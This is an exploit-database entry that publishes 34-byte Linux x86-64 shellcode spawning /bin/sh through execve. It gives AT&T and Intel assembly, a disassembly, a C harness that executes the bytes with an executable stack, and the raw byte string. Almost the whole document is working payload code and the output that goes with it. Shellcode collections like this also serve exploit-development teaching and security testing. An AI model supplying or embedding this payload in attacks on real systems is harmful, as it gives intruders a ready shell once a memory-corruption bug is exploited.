Linux/x64 - execve(/bin/sh) Shellcode (34 bytes)

EDB-ID:

38150

CVE:

N/A




Platform:

Linux_x86-64

Date:

2015-09-11


# Exploit Title: Shellcode /bin/sh for Linux x86_64 (different approach)
# Date: 2015-09-10
# Exploit Author: Fanda Uchytil
# Version: 1
# Tested on: Linux 3.16.0-4-amd64 (Debian), 2.6.32-openvz-042stab093.5-amd64 (Centos/RHEL based), 2.6.32-5-amd64 (Debian)


AT&T VERSION (for smooth debug)
-------------------------------

.global _start
.text
_start:
    # int execve(const char *filename, char *const argv[], char *const envp[]);
    xor     %rax, %rax
    add     $59, %rax                   # Linux 64b execve
    xor     %rdi, %rdi
    push    %rdi                        # '\0' for termination of string below
    mov     $0x68732F2f6e69622F, %rdi   # "/bin//sh" (slash padding)
    push    %rdi
    lea     (%rsp), %rdi
    xor     %rsi, %rsi                  # no shell arguments
    xor     %rdx, %rdx                  # no env vars
    syscall


$ gcc -nostdlib shellcode_atnt.s -o shellcode_atnt && objdump -d shellcode_atnt
$ ./shellcode_atnt
$ gdb -q ./shellcode_atnt


Disassembly of section .text:
  4000d4:       48 31 c0                xor    %rax,%rax
  4000d7:       48 83 c0 3b             add    $0x3b,%rax
  4000db:       48 31 ff                xor    %rdi,%rdi
  4000de:       57                      push   %rdi
  4000df:       48 bf 2f 62 69 6e 2f    movabs $0x68732f2f6e69622f,%rdi
  4000e6:       2f 73 68
  4000e9:       57                      push   %rdi
  4000ea:       48 8d 3c 24             lea    (%rsp),%rdi
  4000ee:       48 31 f6                xor    %rsi,%rsi
  4000f1:       48 31 d2                xor    %rdx,%rdx
  4000f4:       0f 05                   syscall




INTEL VERSION
-------------

    BITS 64
    xor rax, rax
    add rax, 59
    xor rdi, rdi
    push rdi
    mov rdi, 0x68732F2f6e69622F
    push rdi
    lea rdi, [rsp]
    xor rsi, rsi
    xor rdx, rdx
    syscall


$ nasm shellcode.a




SHELLCODE_TEST.C
----------------

  int main(int argc, char **argv) {
      int (*f)() = (int(*)()) argv[1];
      return (*f)();
  }


$ gcc -o shellcode_test shellcode_test.c -z execstack     # or use `execstack(8)` before command below
$ ./shellcode_test "$(cat shellcode)"




STRING
------

$ xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\&/g'
\48\31\c0\48\83\c0\3b\48\31\ff\57\48\bf\2f\62\69\6e\2f\2f\73\68\57\48\8d\3c\24\48\31\f6\48\31\d2\0f\05

$ ./shellcode_test "$(printf "$(xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\x&/g')")"